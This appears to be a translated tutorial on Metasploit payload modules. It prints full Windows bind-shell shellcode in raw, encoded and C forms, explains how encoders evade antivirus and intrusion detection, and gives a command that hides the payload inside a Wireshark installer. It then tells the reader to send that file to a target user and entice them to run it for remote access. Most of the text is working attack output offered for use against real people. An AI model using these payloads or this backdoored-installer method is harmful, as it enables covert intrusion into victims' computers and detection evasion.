On the payload modules in Metasploit

We do not have to exploit a vulnerability at all: we can send the payload straight to the target host and entice the user to run it, which also gets us a shell on the target.

msf > use payload/windows/shell_bind_tcp   # use this module; it binds (listens on) a TCP port on the host where it runs
msf payload(windows/shell_bind_tcp) > generate  # generate emits the payload as hex escapes, by default as Ruby source
# windows/shell_bind_tcp - 328 bytes
# http://www.metasploit.com
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
# EXITFUNC=process
buf = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50" +
"\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26" +
"\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7" +
"\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78" +
"\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3" +
"\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01" +
"\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58" +
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3" +
"\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a" +
"\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32" +
"\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff" +
"\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b" +
"\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40\x50\x68" +
"\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89\xe6" +
"\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57" +
"\x97\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89" +
"\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50" +
"\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f" +
"\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d" +
"\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff" +
"\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72" +
"\x6f\x6a\x00\x53\xff\xd5"

The shellcode produced by generate is fully functional, but it contains some null bytes. When certain programs parse it, a null byte is treated as the end of the string, so the code is truncated and stops before it has run to completion. In short, the \x00 and \xff bytes in it break the payload.

Moreover, shellcode sent in cleartext over the network is very likely to be recognized by intrusion detection systems and antivirus software. To deal with this, the Metasploit developers provide MSF encoders, which let a penetration tester encode the raw payload to avoid bad characters and to evade AV and IDS detection.
We use generate -b '\x00' to encode away the \x00 bad character so that execution is not truncated.

msf payload(windows/shell_bind_tcp) > generate -b '\x00\xff'
# windows/shell_bind_tcp - 355 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai  # the encoder used to encode out the bad chars; generate picks one automatically
# VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
# EXITFUNC=process
buf = 
"\xbd\x43\x0e\x07\xaa\xda\xd0\xd9\x74\x24\xf4\x58\x29\xc9" +
"\xb1\x53\x31\x68\x12\x03\x68\x12\x83\xab\xf2\xe5\x5f\xd7" +
"\xe3\x68\x9f\x27\xf4\x0c\x29\xc2\xc5\x0c\x4d\x87\x76\xbd" +
"\x05\xc5\x7a\x36\x4b\xfd\x09\x3a\x44\xf2\xba\xf1\xb2\x3d" +
"\x3a\xa9\x87\x5c\xb8\xb0\xdb\xbe\x81\x7a\x2e\xbf\xc6\x67" +
"\xc3\xed\x9f\xec\x76\x01\xab\xb9\x4a\xaa\xe7\x2c\xcb\x4f" +
"\xbf\x4f\xfa\xde\xcb\x09\xdc\xe1\x18\x22\x55\xf9\x7d\x0f" +
"\x2f\x72\xb5\xfb\xae\x52\x87\x04\x1c\x9b\x27\xf7\x5c\xdc" +
"\x80\xe8\x2a\x14\xf3\x95\x2c\xe3\x89\x41\xb8\xf7\x2a\x01" +
"\x1a\xd3\xcb\xc6\xfd\x90\xc0\xa3\x8a\xfe\xc4\x32\x5e\x75" +
"\xf0\xbf\x61\x59\x70\xfb\x45\x7d\xd8\x5f\xe7\x24\x84\x0e" +
"\x18\x36\x67\xee\xbc\x3d\x8a\xfb\xcc\x1c\xc3\xc8\xfc\x9e" +
"\x13\x47\x76\xed\x21\xc8\x2c\x79\x0a\x81\xea\x7e\x6d\xb8" +
"\x4b\x10\x90\x43\xac\x39\x57\x17\xfc\x51\x7e\x18\x97\xa1" +
"\x7f\xcd\x02\xa9\x26\xbe\x30\x54\x98\x6e\xf5\xf6\x71\x65" +
"\xfa\x29\x61\x86\xd0\x42\x0a\x7b\xdb\x7d\x97\xf2\x3d\x17" +
"\x37\x53\x95\x8f\xf5\x80\x2e\x28\x05\xe3\x06\xde\x4e\xe5" +
"\x91\xe1\x4e\x23\xb6\x75\xc5\x20\x02\x64\xda\x6c\x22\xf1" +
"\x4d\xfa\xa3\xb0\xec\xfb\xe9\x22\x8c\x6e\x76\xb2\xdb\x92" +
"\x21\xe5\x8c\x65\x38\x63\x21\xdf\x92\x91\xb8\xb9\xdd\x11" +
"\x67\x7a\xe3\x98\xea\xc6\xc7\x8a\x32\xc6\x43\xfe\xea\x91" +
"\x1d\xa8\x4c\x48\xec\x02\x07\x27\xa6\xc2\xde\x0b\x79\x94" +
"\xde\x41\x0f\x78\x6e\x3c\x56\x87\x5f\xa8\x5e\xf0\xbd\x48" +
"\xa0\x2b\x06\x78\xeb\x71\x2f\x11\xb2\xe0\x6d\x7c\x45\xdf" +
"\xb2\x79\xc6\xd5\x4a\x7e\xd6\x9c\x4f\x3a\x50\x4d\x22\x53" +
"\x35\x71\x91\x54\x1c"

You can of course also choose the encoder yourself with generate -e:

msf payload(windows/shell_bind_tcp) > generate -e x86/nonupper

generate's options:
-b: specify the bad characters to filter out by encoding
-t: specify the payload output format, e.g. exe or py; the default is hex escapes in Ruby source
-e: specify a particular encoder; if omitted, the framework picks a suitable encoder itself
-i: followed by the number of encoding iterations, i.e. how many times to encode
-k: do not spawn a new process, only a thread, for better stealth
-x: inject the payload into an executable template (think of it as an application), so that whenever that application runs, the payload runs too
-f: specify the output location
For example:
we insert the payload into wireshark.exe and name the result 1.exe

msf payload(windows/shell_bind_tcp) > generate -b '\x00\xff' -t exe -i 5 -k -x /root/Wireshark-win64-2.6.3.exe -f /root/1.exe
[*] Writing 628224 bytes to /root/1.exe...

Then package up the wireshark installer, send it to the user of the target host and entice them to run it; after that you can connect to the target host from your own machine with a remote access tool.

NOP: no-operation / next operation (does nothing): when execution reaches a NOP instruction, the CPU simply slides on to the next byte, and if that byte is also a NOP it keeps sliding.

Use generate -t c to emit the payload as C source:

msf payload(windows/shell_bind_tcp) > generate -t c
/*
 * windows/shell_bind_tcp - 328 bytes
 * http://www.metasploit.com
 * VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false, 
 * EXITFUNC=process
 */
unsigned char buf[] = 
"\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52"
"\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1"
"\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b"
"\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03"
"\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b"
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24"
"\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb"
"\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c"
"\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68"
"\x29\x80\x6b\x00\xff\xd5\x6a\x08\x59\x50\xe2\xfd\x40\x50\x40"
"\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x68\x02\x00\x11\x5c\x89"
"\xe6\x6a\x10\x56\x57\x68\xc2\xdb\x37\x67\xff\xd5\x57\x68\xb7"
"\xe9\x38\xff\xff\xd5\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97"
"\x68\x75\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57"
"\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c"
"\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46"
"\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0"
"\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5"
"\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb"
"\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5";
